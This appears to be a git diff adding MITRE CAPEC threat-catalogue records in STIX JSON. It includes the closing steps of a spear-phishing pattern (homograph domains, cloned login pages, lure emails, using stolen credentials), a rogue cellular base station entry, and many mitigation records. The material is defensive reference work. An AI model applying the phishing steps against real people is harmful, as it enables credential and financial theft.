  1. Optional: Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Optional: Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look at feel, but contain completely new content.

  3. Optional: Build variants of the website with very specific user information e.g., living area, etc.: Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.

    4. Techniques
    Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.

Exploit

  1. Convince user to enter sensitive information on adversary's site.: An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.

  2. Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

    3. Techniques
    Log in to the legitimate site using another user's supplied credentials.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "None. Any user can be targeted by a Spear Phishing attack." + ], + "x_capec_resources_required": [ + "An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into." + ], + "x_capec_skills_required": { + "Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json new file mode 100644 index 0000000000000000000000000000000000000000..4d927ab329e85065e0324f1524c70fa56d8abe63 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--9ee05b1f-b42a-4ca7-bec0-76ac5b10befa", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json new file mode 100644 index 0000000000000000000000000000000000000000..c30f906ed89682fbb91988d2f5d685c96e8173ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--40108958-603d-430e-8863-ab4b842d9499", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json new file mode 100644 index 0000000000000000000000000000000000000000..0df5c0c3f7bcb0269c7b3ac0014f0dd083031874 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c93afaab-2fef-49f2-89ab-0914e853032b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json new file mode 100644 index 0000000000000000000000000000000000000000..e584f22f60c3131623895d4d03bda6132df93318 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--78cdfdad-383e-4ecd-8664-81655793a91f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json new file mode 100644 index 0000000000000000000000000000000000000000..4d79d9adb608e4f2aadebe0df7761754356080df --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--77601cc5-db30-402f-864e-43245c9db038", + "objects": [ + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json new file mode 100644 index 0000000000000000000000000000000000000000..46214470235b16dc47b91cea4cb35e14a2d710c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f397a47c-2b51-4f53-9b0c-8e0fba0457ef", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json new file mode 100644 index 0000000000000000000000000000000000000000..42044847b906f9cf434699f8279d15fb3d739a4d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--cd028a71-1f05-4ba7-89c1-9edf69928872", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json new file mode 100644 index 0000000000000000000000000000000000000000..1a0a0fe2cc636b17ce8aafc535d694e3d4722dde --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c0d1f313-dccd-45e3-84df-9789fea24306", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json new file mode 100644 index 0000000000000000000000000000000000000000..57c1476802a44c22fc72a6524add14e51305d9c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0102035e-f40f-43fc-a9cb-afd5801c2a67", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json new file mode 100644 index 0000000000000000000000000000000000000000..250b7098eada48c42c17978b8f568f360f714a2e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1ab0a6d2-0b68-4617-ac99-23f159411736", + "objects": [ + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json new file mode 100644 index 0000000000000000000000000000000000000000..126b90cb5abea2ef45a972202c482b58568f700c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fbc59ac7-fbb7-4207-a90f-a049145abf30", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json new file mode 100644 index 0000000000000000000000000000000000000000..cd3e0696c51eb8ae38c7d0feff106925578f7215 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0d630921-c8ac-42ac-9493-0ec968b86a04", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json new file mode 100644 index 0000000000000000000000000000000000000000..6542c5c03e00955474f79f28924d7d12e0bcee4e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--547d2fc9-53a3-4e10-967c-918bf427020b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json new file mode 100644 index 0000000000000000000000000000000000000000..178d0ae615d21be54df3ce8ddefa32003192a7f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2dccb8a3-fa75-4091-812d-7898af223236", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json new file mode 100644 index 0000000000000000000000000000000000000000..46b72d8b8dc872086d430109465f2fa35a5552b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b6577859-de4b-4fb4-adcc-30508befee9b", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json new file mode 100644 index 0000000000000000000000000000000000000000..c7270b098a60acd90f18668b9bf829ec1540786b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--41d43048-7291-464d-829b-2f3627b2dcb7", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json new file mode 100644 index 0000000000000000000000000000000000000000..83abb7f1c9cfb4110e37769e41d4c98b3a4ccd6a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--68c438dc-a9ed-4786-908c-2cf90a5bab66", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json new file mode 100644 index 0000000000000000000000000000000000000000..e86f969763daf3f6b97f4f73b6451a4bbef9e018 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c48f2a77-7ad5-4c15-8308-2f7f2a50f015", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json new file mode 100644 index 0000000000000000000000000000000000000000..d084ce03484bf750c6138c4aa596064f5eb0c792 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--25e51895-2b4b-4be7-b6e0-e664a5f0f566", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json new file mode 100644 index 0000000000000000000000000000000000000000..2c8ea725861d511d3dec54889825047825d09bc6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ecbe37b2-94e5-40ec-8843-4689a5877e90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json new file mode 100644 index 0000000000000000000000000000000000000000..1ff754bae06ecd6296144d5db94a1d357ad8f01c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--07eef5b2-e628-49fb-b195-16de5a6b726e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json new file mode 100644 index 0000000000000000000000000000000000000000..e0e7946090f8e8442f56b6b64d741e40f450281b --- /dev/null +++ 